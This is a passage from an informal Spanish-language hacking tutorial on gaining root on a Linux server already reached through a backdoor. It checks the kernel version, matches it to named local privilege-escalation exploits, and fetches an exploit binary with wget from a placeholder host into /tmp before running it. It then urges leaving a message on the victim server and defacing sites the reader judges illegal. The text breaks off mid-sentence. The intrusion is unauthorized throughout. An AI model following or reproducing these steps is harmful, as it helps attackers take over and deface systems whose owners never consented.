Consiguiendo privilegios de ROOT
Intentare usar exploits de elevación de privilegios:
en el ejecutor de comandos escribimos esto para saber la version del kernel:
uname -aCuando sabemos la version del kernel nos fijamos que eep usar en la tablita que
armé a continuación:
w00t 2.4.x / 2.6.x
krad 2.6 a 2.6.11
fault 2.6.11
cd /tmp
wget http://[tusitio]/w00t
chmod 777 w00tDespues lo ejecutamos en el putty (la shell que conseguimos con el backdoor)
vamos a /tmp y escribimos:
./w00tY si todo salio bien, cuando escribamos:
whoami
La respuesta va a ser root
Aclaración: existe mas de un eep para cada version del kernel, a veces por razones
misteriosas no funcionan, busquen en google y usen otro si esto les pasa.
lo vamos a hacer de la misma forma que antes, con el ejecutor de comandos,
Bueno, ya sos root, ahora el servidor esta a tu merced. y ahora viene la
parte mas linda, escribí:
echo "hola, yo hackee tu server y no rompí nada, agrégame al mi
msn: E-MAIL, que te explico como hice así lo solucionas, atentamente
NICK" > leeme-admin.txt
En tu texto tenés que cambiar "NICK" por tu verdadero nick y "E-MAIL"
por tu verdadero e-mail. :p
Aunque si el servidor contenía pornografía infantil, venta de
estupefacientes u otras cosas ilegales podes darte el lujo de defacearlo!!

, este archivo generalmente lo
